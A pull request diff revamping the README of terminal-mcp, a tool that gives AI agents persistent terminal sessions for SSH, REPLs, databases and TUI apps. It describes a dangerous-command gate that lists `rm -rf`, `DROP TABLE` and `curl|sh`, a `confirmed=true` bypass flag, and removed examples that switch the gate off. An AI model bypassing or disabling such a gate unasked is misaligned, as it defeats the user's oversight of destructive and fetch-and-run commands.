### PR TITLE
docs: revamp README and add comprehensive documentation

### DIFF
--- a/README.md
+++ b/README.md
@@ -4,9 +4,7 @@
   <img src="assets/banner.svg" width="800" alt="terminal-mcp banner"/>
 </p>
 
-<p align="center">
-  <strong>MCP server for interactive terminal sessions — SSH, REPLs, database CLIs, and TUI apps.</strong>
-</p>
+<h3 align="center">Give your AI a real terminal. Persistent sessions. Interactive programs. Zero limitations.</h3>
 
 <p align="center">
   <a href="https://pypi.org/project/terminal-mcp/"><img src="https://img.shields.io/pypi/v/terminal-mcp.svg" alt="PyPI"/></a>
@@ -20,7 +18,7 @@
   <a href="https://insiders.vscode.dev/redirect/mcp/install?name=terminal-mcp&config=%7B%22command%22%3A%22uvx%22%2C%22args%22%3A%5B%22terminal-mcp%22%5D%7D"><img src="https://img.shields.io/badge/VS_Code-Install-007ACC?logo=visual-studio-code&logoColor=white" alt="Install in VS Code"/></a>
   <a href="https://insiders.vscode.dev/redirect/mcp/install?name=terminal-mcp&config=%7B%22command%22%3A%22uvx%22%2C%22args%22%3A%5B%22terminal-mcp%22%5D%7D"><img src="https://img.shields.io/badge/VS_Code_Insiders-Install-24bfa5?logo=visual-studio-code&logoColor=white" alt="Install in VS Code Insiders"/></a>
   <a href="cursor://anysphere.cursor-mcp/install?name=terminal-mcp&config=eyJjb21tYW5kIjoidXZ4IiwiYXJncyI6WyJ0ZXJtaW5hbC1tY3AiXX0="><img src="https://img.shields.io/badge/Cursor-Install-F37626?logo=cursor&logoColor=white" alt="Install in Cursor"/></a>
-  <a href="#register-with-claude-desktop"><img src="https://img.shields.io/badge/Claude_Desktop-Install-cc785c?logo=claude&logoColor=white" alt="Install in Claude Desktop"/></a>
+  <a href="#install-in-claude-desktop"><img src="https://img.shields.io/badge/Claude_Desktop-Install-cc785c?logo=claude&logoColor=white" alt="Install in Claude Desktop"/></a>
 </p>
 
 <p align="center">
@@ -29,80 +27,48 @@
 
 ---
 
-## Why This Exists
+## The Problem
 
-If you've hit any of these limitations with Claude Code, terminal-mcp solves them:
+Every AI coding tool hits the same wall: **no real terminal access**.
 
-- **"Claude Code can't handle interactive sessions"** — The built-in Bash tool runs each command in a fresh subprocess. No persistence, no back-and-forth.
-- **"SSH not supported in Claude Code"** — You can't SSH into a server and run multiple commands across an active connection.
-- **"Claude Code Bash tool doesn't support REPLs"** — Python, Node, Ruby, and other interpreters need a persistent session for multi-line interaction.
-- **"How to use psql / mysql / redis-cli with Claude Code"** — Database CLIs require a live connection that survives across tool calls.
-- **"Interactive terminal not working in Claude Code"** — TUI apps (htop, vim, ncdu, fzf) need a real PTY with special key support.
-- **"Claude Code can't send arrow keys or Tab"** — The Bash tool has no concept of terminal escape sequences.
+Claude Code's Bash tool, GitHub Copilot, and Codex all run commands in isolated subprocesses. Each command starts fresh. No state carries over. That means:
 
-terminal-mcp fills this gap by exposing MCP tools that create and manage real PTY sessions. Each session runs as a persistent child process; you send input, special keys, and control characters and read output across multiple tool calls for as long as the session lives.
+- **No SSH sessions** - Can't connect to a remote server and run multiple commands
+- **No REPLs** - Can't use Python, Node, or Ruby interpreters interactively
+- **No database CLIs** - Can't maintain a psql, mysql, or redis-cli connection
+- **No TUI apps** - Can't navigate htop, vim, or fzf with arrow keys
+- **No long-running processes** - Can't monitor builds, watch logs, or run dev servers
 
-## Features
+## The Solution
 
-- **Persistent PTY sessions** — real terminal sessions that survive across tool calls
-- **Send + read in one call** — `session_interact` combines send and read, halving LLM round trips
-- **Regex-triggered reads** — `session_wait_for` blocks until a pattern matches in output — no more guessing timeouts
-- **Dangerous command gate** — detects risky commands (`rm -rf`, `DROP TABLE`, `curl|sh`, etc.) and requires confirmation
-- **OSC 133 shell integration** — auto-detects command boundaries and exit codes from modern shells
-- **Special key support** — arrow keys, Tab, Escape, function keys (F1–F12), Home/End, Page Up/Down
-- **Control characters** — Ctrl-C, Ctrl-D, Ctrl-Z, Ctrl-L, and telnet escape
-- **Four read modes** — stream (waits for output to settle), snapshot (pyte screen buffer), auto (auto-detects TUI apps), and diff (returns only changed screen lines)
-- **Auto TUI detection** — automatically detects alternate screen buffer (htop, vim, etc.) and switches to snapshot mode
-- **Output diff mode** — returns only changed lines since last read, minimizing tokens for TUI monitoring
-- **Intelligent truncation** — four truncation modes: `tail` (default), `head_tail` (preserves beginning and end), `tail_only` (for build logs), `none`
-- **ANSI stripping** — optional removal of escape sequences for clean text output
-- **Idle cleanup** — automatic session cleanup after configurable timeout
-- **Session management** — list, label, and manage multiple concurrent sessions
-- **Dynamic resize** — resize terminal dimensions on the fly with SIGWINCH support
-- **Secret input** — send passwords without logging them
-- **Scrollback history** — access terminal scrollback buffer beyond the visible screen
-- **One-shot execution** — run a single command without manual session management
-- **Smart output truncation** — four truncation strategies (`tail`, `head_tail`, `tail_only`, `none`) to prevent context overflow while preserving the most useful output
-- **Env var configuration** — configure all settings via `TERMINAL_MCP_*` environment variables
-- **PyPI distribution** — install directly with `pip install terminal-mcp`
+**terminal-mcp** gives AI agents a real terminal. Persistent PTY sessions that survive across tool calls. Send commands, read output, press keys, navigate TUIs - exactly like a human at a terminal.
 
-## Supported Clients
-
-| Client | Status | Install |
-|--------|--------|---------|
-| **Claude Code** (CLI) | ✅ Supported | `~/.claude.json` or `.mcp.json` |
-| **Claude Desktop** | ✅ Supported | [One-click install](#register-with-claude-desktop) |
-| **VS Code** (Copilot Chat) | ✅ Supported | [One-click install](https://insiders.vscode.dev/redirect/mcp/install?name=terminal-mcp&config=%7B%22command%22%3A%22uvx%22%2C%22args%22%3A%5B%22terminal-mcp%22%5D%7D) or `.vscode/mcp.json` |
-| **Cursor** | ✅ Supported | [One-click install](cursor://anysphere.cursor-mcp/install?name=terminal-mcp&config=eyJjb21tYW5kIjoidXZ4IiwiYXJncyI6WyJ0ZXJtaW5hbC1tY3AiXX0=) or Settings → MCP |
-| **Windsurf** | ✅ Supported | `~/.codeium/windsurf/mcp_config.json` |
-
-## Quickstart
-
-### Install
-
-**Recommended** — no install needed:
-
-```bash
+```
 uvx terminal-mcp
 ```
 
-**Or install via pip:**
+One command. Works with Claude Code, Claude Desktop, VS Code, Cursor, and Windsurf.
+
+---
+
+## Quick Start
+
+### 1. Install (30 seconds)
 
 ```bash
+# No install needed - run directly
+uvx terminal-mcp
+
+# Or install globally
 pip install terminal-mcp
 ```
 
-**Or from source:**
+### 2. Connect to Your AI Client
 
-```bash
-git clone https://github.com/mkpvishnu/terminal-mcp.git
-cd terminal-mcp
-pip install -e ".[dev]"
-```
+<details open>
+<summary><strong>Claude Code</strong></summary>
 
-### Register with Claude Code
-
-Add to `~/.claude.json` (or project `.mcp.json`):
+Add to `~/.claude.json` or project `.mcp.json`:
 
 ```json
 {
@@ -115,9 +81,12 @@ Add to `~/.claude.json` (or project `.mcp.json`):
 }
 ```
 
-### Register with Claude Desktop
+</details>
 
-Add to your `claude_desktop_config.json`:
+<details>
+<summary><strong>Claude Desktop</strong></summary>
+
+Add to `claude_desktop_config.json`:
 
 ```json
 {
@@ -130,7 +99,10 @@ Add to your `claude_desktop_config.json`:
 }
 ```
 
-### Register with VS Code / Cursor
+</details>
+
+<details>
+<summary><strong>VS Code / Cursor</strong></summary>
 
 Click the one-click install badge above, or add to `.vscode/mcp.json`:
 
@@ -145,290 +117,134 @@ Click the one-click install badge above, or add to `.vscode/mcp.json`:
 }
 ```
 
-### Verify it works
+</details>
+
+<details>
+<summary><strong>Windsurf</strong></summary>
+
+Add to `~/.codeium/windsurf/mcp_config.json`:
+
+```json
+{
+  "mcpServers": {
+    "terminal": {
+      "command": "uvx",
+      "args": ["terminal-mcp"]
+    }
+  }
+}
+```
+
+</details>
+
+### 3. Verify
 
 ```
 session_exec  exec="echo hello from terminal-mcp"
 ```
 
-## Demo
+---
 
-<details>
-<summary><strong>SSH session to a remote server</strong></summary>
+## What Can You Do With It?
 
-```
-session_create  command="ssh user@myserver.example.com"  label="prod-ssh"
-session_read    session_id="a1b2c3d4"  timeout=5.0
-session_send    session_id="a1b2c3d4"  password="mypassword"
-session_send    session_id="a1b2c3d4"  input="df -h"
-session_read    session_id="a1b2c3d4"
-session_close   session_id="a1b2c3d4"
-```
-
-</details>
-
-<details>
-<summary><strong>Python REPL</strong></summary>
+### SSH Into Remote Servers
 
 ```
-session_create  command="python3"  label="repl"
-session_read    session_id="e5f6g7h8"
-session_send    session_id="e5f6g7h8"  input="import math"
-session_send    session_id="e5f6g7h8"  input="print(math.sqrt(144))"
-session_read    session_id="e5f6g7h8"
-session_close   session_id="e5f6g7h8"
+session_create   command="ssh user@prod-server.com"   label="prod"
+session_interact session_id="a1b2c3d4"  input="df -h"  wait_for="\$"
+session_interact session_id="a1b2c3d4"  input="docker ps"  wait_for="\$"
+session_close    session_id="a1b2c3d4"
 ```
 
-</details>
-
-<details>
-<summary><strong>TUI navigation with special keys</strong></summary>
+### Run Interactive REPLs
 
 ```
-session_create  command="python3 -m openclaw configure"  label="openclaw"
-session_read    session_id="x1y2z3w4"  timeout=3.0
-session_send    session_id="x1y2z3w4"  key="down"
-session_send    session_id="x1y2z3w4"  key="down"
-session_send    session_id="x1y2z3w4"  key="enter"
-session_read    session_id="x1y2z3w4"
-session_send    session_id="x1y2z3w4"  key="tab"
-session_read    session_id="x1y2z3w4"
-session_close   session_id="x1y2z3w4"
+session_create   command="python3"  label="python"
+session_interact session_id="e5f6g7h8"  input="import pandas as pd"  wait_for=">>>"
+session_interact session_id="e5f6g7h8"  input="df = pd.read_csv('data.csv')"  wait_for=">>>"
+session_interact session_id="e5f6g7h8"  input="df.describe()"  wait_for=">>>"
+session_close    session_id="e5f6g7h8"
 ```
 
-</details>
+### Query Databases
 
-<details>
-<summary><strong>Auto TUI detection and diff mode</strong></summary>
+```
+session_create   command="psql -U admin mydb"  label="db"
+session_interact session_id="x1y2z3w4"  input="SELECT count(*) FROM users;"  wait_for="row"
+session_interact session_id="x1y2z3w4"  input="\dt"  wait_for="#"
+session_close    session_id="x1y2z3w4"
+```
+
+### Navigate TUI Apps
 
 ```
 session_create   command="htop"  label="monitor"
 session_read     session_id="a1b2c3d4"
-→ auto-detects TUI, returns snapshot with mode_used="snapshot", tui_active=true
+# Auto-detects TUI, returns screen snapshot
 
+session_send     session_id="a1b2c3d4"  key="F6"
 session_read     session_id="a1b2c3d4"  mode="diff"
-→ returns only changed lines since last read
+# Returns only changed lines - saves tokens
 
-session_read     session_id="a1b2c3d4"  mode="diff"
-→ returns only lines that changed, minimizing tokens
-
+session_send     session_id="a1b2c3d4"  key="F10"
 session_close    session_id="a1b2c3d4"
 ```
 
-</details>
-
-<details>
-<summary><strong>One-shot command execution</strong></summary>
-
-```
-session_exec  exec="ls -la /tmp"
-session_exec  exec="python3 -c 'print(42)'"  command="bash"  timeout=10.0
-```
-
-</details>
-
-<details>
-<summary><strong>Send + read in one call (session_interact)</strong></summary>
-
-```
-session_create   command="bash"  label="demo"
-session_interact session_id="a1b2c3d4"  input="ls -la"  wait_for="\\$\\s*$"  timeout=5.0
-session_interact session_id="a1b2c3d4"  input="whoami"  wait_for="\\$"
-session_close    session_id="a1b2c3d4"
-```
-
-</details>
-
-<details>
-<summary><strong>Wait for specific output pattern</strong></summary>
+### Monitor Long-Running Builds
 
 ```
 session_create   command="bash"  label="build"
 session_send     session_id="a1b2c3d4"  input="npm run build"
-session_wait_for session_id="a1b2c3d4"  pattern="Build complete|ERROR"  timeout=60.0
-session_close    session_id="a1b2c3d4"
+session_wait_for session_id="a1b2c3d4"  pattern="Build complete|ERROR"  timeout=120
 ```
 
-</details>
-
-<details>
-<summary><strong>Dangerous command confirmation</strong></summary>
+### Run One-Off Commands
 
 ```
-session_send    session_id="a1b2c3d4"  input="rm -rf /tmp/old"
-→ returns: requires_confirmation=true, reason="Matched dangerous pattern: ..."
-
-session_send    session_id="a1b2c3d4"  input="rm -rf /tmp/old"  confirmed=true
-→ executes the command
+session_exec  exec="git log --oneline -10"
+session_exec  exec="docker compose ps"  timeout=10
 ```
 
-</details>
+---
 
-<details>
-<summary><strong>Sending Ctrl-C to interrupt</strong></summary>
+## Features at a Glance
 
-```
-session_send    session_id="a1b2c3d4"  control_char="c"
-session_read    session_id="a1b2c3d4"
-```
+| Feature | What It Does |
+|---------|-------------|
+| **Persistent Sessions** | Real PTY sessions that survive across tool calls |
+| **Send + Read in One Call** | `session_interact` halves LLM round trips |
+| **Pattern-Based Reads** | `wait_for` blocks until regex matches - no guessing timeouts |
+| **Auto TUI Detection** | Detects htop, vim, etc. and auto-switches to screen snapshot mode |
+| **Output Diff Mode** | Returns only changed screen lines - minimizes tokens |
+| **Special Keys** | Arrow keys, Tab, F1-F12, Home/End, Page Up/Down |
+| **Control Characters** | Ctrl-C, Ctrl-D, Ctrl-Z, Ctrl-L, telnet escape |
+| **Dangerous Command Gate** | Blocks `rm -rf`, `DROP TABLE`, `curl\|sh` - requires confirmation |
+| **OSC 133 Shell Integration** | Auto-detects command boundaries and exit codes |
+| **Smart Truncation** | Four strategies to prevent context overflow |
+| **Secret Input** | Send passwords without logging |
+| **Dynamic Resize** | Resize terminal on the fly with SIGWINCH |
+| **Idle Cleanup** | Auto-closes idle sessions |
+| **Cross-Platform** | Linux, macOS, and Windows support |
 
-</details>
+---
 
-## Tool Reference
+## Tools Reference
 
-### session_create
+terminal-mcp exposes **9 MCP tools**. Full details in [docs/tools.md](docs/tools.md).
 
-Spawn a persistent PTY terminal session.
+| Tool | Purpose |
+|------|---------|
+| [`session_create`](docs/tools.md#session_create) | Spawn a persistent terminal session |
+| [`session_send`](docs/tools.md#session_send) | Send text, keys, or control characters |
+| [`session_read`](docs/tools.md#session_read) | Read output (stream, snapshot, auto, diff modes) |
+| [`session_interact`](docs/tools.md#session_interact) | Send + read in one call |
+| [`session_wait_for`](docs/tools.md#session_wait_for) | Wait for regex pattern in output |
+| [`session_exec`](docs/tools.md#session_exec) | One-shot command execution |
+| [`session_close`](docs/tools.md#session_close) | Close a session gracefully |
+| [`session_resize`](docs/tools.md#session_resize) | Resize terminal dimensions |
+| [`session_list`](docs/tools.md#session_list) | List active sessions |
 
-| Parameter | Type | Required | Default | Description |
-|-----------|------|----------|---------|-------------|
-| `command` | string | Yes | — | Shell command to run (e.g. `bash`, `python3`, `ssh user@host`) |
-| `label` | string | No | command name | Human-readable label |
-| `rows` | integer | No | 24 | Terminal height |
-| `cols` | integer | No | 80 | Terminal width |
-| `idle_timeout` | integer | No | 1800 | Seconds before auto-close |
-| `enable_snapshot` | boolean | No | true | Deprecated: snapshot is now always enabled |
-| `scrollback_lines` | integer | No | 1000 | Scrollback history lines |
-
-**Returns:** `session_id`, `label`, `pid`, `created_at`, `snapshot_available`
-
-### session_send
-
-Send input text, a control character, or a special key to an active session. Only one of `input`, `control_char`, `key`, or `password` may be provided per call.
-
-| Parameter | Type | Required | Default | Description |
-|-----------|------|----------|---------|-------------|
-| `session_id` | string | Yes | — | Session ID from `session_create` |
-| `input` | string | No | — | Text to send |
-| `press_enter` | boolean | No | true | Append carriage return after input |
-| `control_char` | string | No | — | Control character: `c` `d` `z` `l` `]` |
-| `key` | string | No | — | Special key (see table below) |
-| `password` | string | No | — | Password or secret (not logged) |
-| `confirmed` | boolean | No | false | Bypass dangerous command gate |
-
-**Returns:** `bytes_sent` — or `requires_confirmation`, `reason` if the command matches a dangerous pattern
-
-<details>
-<summary>Supported special keys</summary>
-
-| Key | Description | Key | Description |
-|-----|-------------|-----|-------------|
-| `up` | Arrow up | `f1`–`f12` | Function keys |
-| `down` | Arrow down | `home` | Home |
-| `left` | Arrow left | `end` | End |
-| `right` | Arrow right | `page-up` | Page Up |
-| `tab` | Tab | `page-down` | Page Down |
-| `shift-tab` | Shift+Tab | `insert` | Insert |
-| `escape` | Escape | `delete` | Delete |
-| `enter` | Enter | `backspace` | Backspace |
-
-</details>
-
-<details>
-<summary>Supported control characters</summary>
-
-| Char | Signal | Description |
-|------|--------|-------------|
-| `c` | SIGINT | Interrupt (Ctrl-C) |
-| `d` | EOF | End of file / logout (Ctrl-D) |
-| `z` | SIGTSTP | Suspend (Ctrl-Z) |
-| `l` | — | Clear screen (Ctrl-L) |
-| `]` | — | Telnet escape |
-
-</details>
-
-### session_resize
-
-Resize the terminal window of an active session.
-
-| Parameter | Type | Required | Default | Description |
-|-----------|------|----------|---------|-------------|
-| `session_id` | string | Yes | — | Session ID |
-| `rows` | integer | Yes | — | New terminal height |
-| `cols` | integer | Yes | — | New terminal width |
-
-**Returns:** `rows`, `cols`
-
-### session_read
-
-Read output from a session.
-
-| Parameter | Type | Required | Default | Description |
-|-----------|------|----------|---------|-------------|
-| `session_id` | string | Yes | — | Session ID |
-| `mode` | string | No | `auto` | `auto`, `stream`, `snapshot`, or `diff` |
-| `timeout` | number | No | 2.0 | Settle timeout in seconds (stream/auto mode) |
-| `strip_ansi` | boolean | No | true | Strip ANSI escape sequences |
-| `scrollback` | integer | No | — | Lines of scrollback history (snapshot mode) |
-| `truncation` | string | No | config default | Truncation mode: `tail`, `head_tail`, `tail_only`, `none` |
-
-**Returns:** `output`, `bytes_read`, `prompt_detected`, `is_alive`, `truncated`, `tui_active`, `snapshot_available`, `mode_used`, `changed_lines` (diff mode), `is_first_read` (diff mode), `total_lines` (scrollback), `osc133`, `command_state`, `exit_code`, `command_complete` (shell integration)
-
-### session_close
-
-Terminate a session gracefully (EOF → SIGHUP → SIGKILL).
-
-| Parameter | Type | Required | Description |
-|-----------|------|----------|-------------|
-| `session_id` | string | Yes | Session ID to close |
-
-**Returns:** `exit_status` — or `already_closed: true` if the session was already terminated (idempotent)
-
-### session_exec
-
-Execute a command in a temporary session and return output. The session is automatically cleaned up.
-
-| Parameter | Type | Required | Default | Description |
-|-----------|------|----------|---------|-------------|
-| `exec` | string | Yes | — | Command to execute |
-| `command` | string | No | `bash` | Shell to use |
-| `timeout` | number | No | 5.0 | Seconds to wait for output |
-| `rows` | integer | No | 24 | Terminal height |
-| `cols` | integer | No | 80 | Terminal width |
-| `truncation` | string | No | config default | Truncation mode: `tail`, `head_tail`, `tail_only`, `none` |
-
-**Returns:** `output`, `bytes_read`, `session_id`, `truncated`
-
-### session_interact
-
-Send input and read output in a single call. Combines `session_send` + `session_read` to halve round trips. Optionally waits for a regex pattern in the output.
-
-| Parameter | Type | Required | Default | Description |
-|-----------|------|----------|---------|-------------|
-| `session_id` | string | Yes | — | Session ID |
-| `input` | string | No | — | Text to send |
-| `press_enter` | boolean | No | true | Append carriage return after input |
-| `control_char` | string | No | — | Control character: `c` `d` `z` `l` `]` |
-| `key` | string | No | — | Special key (see session_send) |
-| `password` | string | No | — | Password or secret (not logged) |
-| `wait_for` | string | No | — | Regex pattern to wait for in output |
-| `timeout` | number | No | 5.0 | Seconds to wait for output |
-| `strip_ansi` | boolean | No | true | Strip ANSI escape sequences |
-| `confirmed` | boolean | No | false | Bypass dangerous command gate |
-| `read_mode` | string | No | `stream` | Read mode: `auto`, `stream`, `snapshot`, `diff` |
-| `truncation` | string | No | config default | Truncation mode: `tail`, `head_tail`, `tail_only`, `none` |
-
-**Returns:** `output`, `bytes_read`, `bytes_sent`, `matched` (when `wait_for` used), `prompt_detected`, `is_alive`, `truncated`, `tui_active`, `mode_used`, `snapshot_available`
-
-### session_wait_for
-
-Read output from a session until a regex pattern matches or timeout expires. Use this instead of `session_read` when you know what output to expect.
-
-| Parameter | Type | Required | Default | Description |
-|-----------|------|----------|---------|-------------|
-| `session_id` | string | Yes | — | Session ID |
-| `pattern` | string | Yes | — | Regex pattern to wait for in output |
-| `timeout` | number | No | 30.0 | Max seconds to wait |
-| `strip_ansi` | boolean | No | true | Strip ANSI escape sequences |
-| `truncation` | string | No | config default | Truncation mode: `tail`, `head_tail`, `tail_only`, `none` |
-
-**Returns:** `output`, `bytes_read`, `matched`, `prompt_detected`, `is_alive`, `truncated`
-
-### session_list
-
-List all active sessions with their status and idle time.
-
-**Returns:** `sessions` (array with `tui_active`, `snapshot_available` per session), `count`
+---
 
 ## Architecture
 
@@ -443,56 +259,23 @@ flowchart LR
     Reader -.->|buffer| Server
 ```
 
-```mermaid
-stateDiagram-v2
-    [*] --> Active : session_create
-    state Active {
-        Idle --> Sending : session_send
-        Sending --> Idle
-        Idle --> Reading : session_read
-        Reading --> Idle
-        Idle --> Resizing : session_resize
-        Resizing --> Idle
-    }
-    Active --> [*] : session_close
-    Active --> [*] : idle_timeout
-```
+Each session is backed by a real PTY via `pexpect.spawn` (or `PopenSpawn` on Windows). For full architecture details, see [docs/architecture.md](docs/architecture.md).
 
-Each session is backed by a real PTY allocated via `pexpect.spawn`. The design has four main parts:
-
-**Background reader thread.** A daemon thread continuously reads from the PTY file descriptor in 4096-byte chunks and appends bytes to an in-memory buffer. The thread is lock-protected and dies automatically when the child process exits.
-
-**Output settling (stream mode).** `session_read` in stream mode polls the buffer until no new bytes have arrived for `timeout` seconds (default 2s), then returns everything written since the last read call. A hard ceiling of `timeout + 10s` prevents infinite blocking.
-
-**Snapshot mode (always on).** All PTY output is fed into a `pyte` virtual screen buffer. In `auto` mode (the default), `session_read` automatically detects TUI applications via alternate screen buffer sequences and returns a rendered snapshot. The `diff` mode returns only changed lines since the last read, minimizing tokens for TUI monitoring.
-
-**Idle cleanup.** `SessionManager` runs a background cleanup loop (every 60s by default) that closes sessions idle longer than their `idle_timeout`. The default timeout is 30 minutes. Concurrent sessions are capped at 10 by default.
+---
 
 ## Configuration
 
-All settings can be overridden via environment variables prefixed with `TERMINAL_MCP_`:
+All settings configurable via `TERMINAL_MCP_*` environment variables. Full reference in [docs/configuration.md](docs/configuration.md).
 
-| Setting | Env Var | Default | Description |
-|---------|---------|---------|-------------|
-| `max_sessions` | `TERMINAL_MCP_MAX_SESSIONS` | `10` | Maximum concurrent sessions |
-| `idle_timeout` | `TERMINAL_MCP_IDLE_TIMEOUT` | `1800` | Seconds before auto-close |
-| `default_rows` | `TERMINAL_MCP_DEFAULT_ROWS` | `24` | Default terminal height |
-| `default_cols` | `TERMINAL_MCP_DEFAULT_COLS` | `80` | Default terminal width |
-| `read_settle_timeout` | `TERMINAL_MCP_READ_SETTLE_TIMEOUT` | `2.0` | Output settle timeout |
-| `max_output_bytes` | `TERMINAL_MCP_MAX_OUTPUT_BYTES` | `100000` | Max bytes per read |
-| `cleanup_interval` | `TERMINAL_MCP_CLEANUP_INTERVAL` | `60` | Seconds between cleanup |
-| `max_buffer_bytes` | `TERMINAL_MCP_MAX_BUFFER_BYTES` | `1000000` | Per-session PTY buffer cap in bytes |
-| `safety_gate` | `TERMINAL_MCP_SAFETY_GATE` | `on` | Dangerous command gate (`off` to disable) |
-| `dangerous_patterns` | `TERMINAL_MCP_DANGEROUS_PATTERNS` | built-in | Extra patterns (semicolon-separated regexes) |
-| `truncation_mode` | `TERMINAL_MCP_TRUNCATION_MODE` | `tail` | Default truncation strategy (`tail`, `head_tail`, `tail_only`, `none`) |
+| Setting | Env Var | Default |
+|---------|---------|---------|
+| Max sessions | `TERMINAL_MCP_MAX_SESSIONS` | `10` |
+| Idle timeout | `TERMINAL_MCP_IDLE_TIMEOUT` | `1800` (30 min) |
+| Safety gate | `TERMINAL_MCP_SAFETY_GATE` | `on` |
+| Buffer cap | `TERMINAL_MCP_MAX_BUFFER_BYTES` | `1000000` (1MB) |
+| Truncation | `TERMINAL_MCP_TRUNCATION_MODE` | `tail` |
 
-**Per-session parameters:** `rows`, `cols`, `idle_timeout`, and `scrollback_lines` can be set per session via `session_create`. There is no global env var for `scrollback_lines` — it defaults to `1000` lines per session. Set `scrollback_lines=0` to disable scrollback history.
-
-### How to Set Environment Variables
-
-Since terminal-mcp runs as a subprocess of your MCP client, environment variables must be configured in the client's MCP server configuration — not in your shell profile (`.bashrc`, `.zshrc`, etc.).
-
-**Claude Code** (`~/.claude.json` or project `.mcp.json`):
+Example with custom settings:
 
 ```json
 {
@@ -503,7 +286,6 @@ Since terminal-mcp runs as a subprocess of your MCP client, environment variable
       "env": {
         "TERMINAL_MCP_MAX_SESSIONS": "20",
         "TERMINAL_MCP_IDLE_TIMEOUT": "3600",
-        "TERMINAL_MCP_SAFETY_GATE": "off",
         "TERMINAL_MCP_TRUNCATION_MODE": "head_tail"
       }
     }
@@ -511,146 +293,33 @@ Since terminal-mcp runs as a subprocess of your MCP client, environment variable
 }
 ```
 
-**Claude Desktop** (`claude_desktop_config.json`):
+---
 
-```json
-{
-  "mcpServers": {
-    "terminal": {
-      "command": "uvx",
-      "args": ["terminal-mcp"],
-      "env": {
-        "TERMINAL_MCP_MAX_SESSIONS": "20",
-        "TERMINAL_MCP_IDLE_TIMEOUT": "3600"
-      }
-    }
-  }
-}
-```
+## Documentation
 
-**VS Code / Cursor** (`.vscode/mcp.json`):
+| Document | Description |
+|----------|-------------|
+| [Tools Reference](docs/tools.md) | Complete API for all 9 MCP tools |
+| [Architecture](docs/architecture.md) | How terminal-mcp works under the hood |
+| [Configuration](docs/configuration.md) | All settings and environment variables |
+| [Safety & Security](docs/safety.md) | Dangerous command detection and safety gate |
+| [Use Cases & Examples](docs/examples.md) | Real-world recipes and patterns |
+| [Changelog](docs/changelog.md) | Version history and release notes |
+| [Contributing](docs/contributing.md) | How to contribute |
 
-```json
-{
-  "servers": {
-    "terminal-mcp": {
-      "command": "uvx",
-      "args": ["terminal-mcp"],
-      "env": {
-        "TERMINAL_MCP_MAX_SESSIONS": "20",
-        "TERMINAL_MCP_IDLE_TIMEOUT": "3600"
-      }
-    }
-  }
-}
-```
+---
 
-**Windsurf** (`~/.codeium/windsurf/mcp_config.json`):
+## Supported Clients
 
-```json
-{
-  "mcpServers": {
-    "terminal": {
-      "command": "uvx",
-      "args": ["terminal-mcp"],
-      "env": {
-        "TERMINAL_MCP_MAX_SESSIONS": "20"
-      }
-    }
-  }
-}
-```
+| Client | Status | Install |
+|--------|--------|---------|
+| **Claude Code** (CLI) | Supported | `~/.claude.json` or `.mcp.json` |
+| **Claude Desktop** | Supported | [One-click install](#install-in-claude-desktop) |
+| **VS Code** (Copilot Chat) | Supported | [One-click install](https://insiders.vscode.dev/redirect/mcp/install?name=terminal-mcp&config=%7B%22command%22%3A%22uvx%22%2C%22args%22%3A%5B%22terminal-mcp%22%5D%7D) or `.vscode/mcp.json` |
+| **Cursor** | Supported | [One-click install](cursor://anysphere.cursor-mcp/install?name=terminal-mcp&config=eyJjb21tYW5kIjoidXZ4IiwiYXJncyI6WyJ0ZXJtaW5hbC1tY3AiXX0=) or Settings |
+| **Windsurf** | Supported | `~/.codeium/windsurf/mcp_config.json` |
 
-You can also set env vars directly in your shell when running the server manually for testing:
-
-```bash
-TERMINAL_MCP_MAX_SESSIONS=20 TERMINAL_MCP_SAFETY_GATE=off uvx terminal-mcp
-```
-
-## Changelog
-
-### v0.4.6
-
-- **Bump actions/github-script from 7 to 8** ([#14](https://github.com/mkpvishnu/terminal-mcp/pull/14))
-
-
-### v0.4.5
-
-- **Remove stale publish.yml workflow** ([#13](https://github.com/mkpvishnu/terminal-mcp/pull/13))
-
-
-### v0.4.4
-
-- **Fix release push: use RELEASE_TOKEN for branch protection bypass** ([#12](https://github.com/mkpvishnu/terminal-mcp/pull/12))
-
-
-### v0.4.3
-
-- **Fix `wait_for` matching command echo** — `session_interact` with `wait_for` no longer matches the echoed input text. Pattern matching now starts from a buffer position anchored before the send, so only genuinely new output is matched (fixes [#6](https://github.com/mkpvishnu/terminal-mcp/issues/6))
-- **Fix `wait_for` matching stale buffer content** — `session_interact` with `wait_for` no longer matches pre-existing unread buffer content (startup banners, previous command output). Uses a monotonic absolute byte counter that survives buffer trims (fixes [#7](https://github.com/mkpvishnu/terminal-mcp/issues/7))
-- **Idempotent `session_close`** — closing an already-closed or naturally-exited session now returns `success: true, already_closed: true` instead of a `not_found` error. Safe for `finally`-style cleanup (fixes [#8](https://github.com/mkpvishnu/terminal-mcp/issues/8))
-- **Comprehensive ANSI stripping** — `strip_ansi` now handles Kitty keyboard protocol sequences, application keypad mode (`ESC=`/`ESC>`), DCS sequences, secondary DA responses, and tilde-terminated CSI sequences that leaked through during TUI exit transitions (fixes [#9](https://github.com/mkpvishnu/terminal-mcp/issues/9))
-
-### v0.4.2
-
-- **Fix `is_alive` race on Linux** — `is_alive` property now uses exception-safe `_is_alive()` internally, preventing `PtyProcessError` when child processes exit before `waitpid` can reap them. Fixes flaky CI failures on Linux runners
-
-### v0.4.1
-
-- **Auto TUI detection** — automatically detects alternate screen buffer sequences (`ESC[?1049h`, `ESC[?47h`, `ESC[?1047h`) and switches `session_read` to snapshot mode. New `mode="auto"` is now the default
-- **Output diff mode** — `session_read` with `mode="diff"` returns only changed screen lines since last read, with 1-indexed line numbers and `is_first_read` flag
-- **Intelligent truncation** — new `truncate_output_smart()` with four strategies: `tail` (keep beginning), `head_tail` (keep first 30% + last 70% with line-count marker), `tail_only` (keep end, ideal for build logs), `none` (disable truncation). Configurable via `truncation` parameter on all read tools or `TERMINAL_MCP_TRUNCATION_MODE` env var
-- **Always-on pyte** — snapshot mode is now always initialized (no need for `enable_snapshot=true`). `enable_snapshot` parameter deprecated
-- **`read_mode` on session_interact** — choose how output is read back: `auto`, `stream`, `snapshot`, or `diff`
-- **Thread-safe screen reads** — `read_snapshot()` and `read_diff()` now acquire buffer lock before reading pyte screen
-- Response fields: `tui_active`, `snapshot_available`, `mode_used` added to read responses; `snapshot_available` added to create and list responses
-
-### v0.4.0
-
-- **`session_interact` tool** — send input and read output in a single MCP call, halving round trips. Supports all input types (text, keys, control chars, passwords) with optional `wait_for` regex pattern
-- **`session_wait_for` tool** — block until a regex pattern matches in session output or timeout expires. Replaces fragile timeout-based reads when you know what to expect
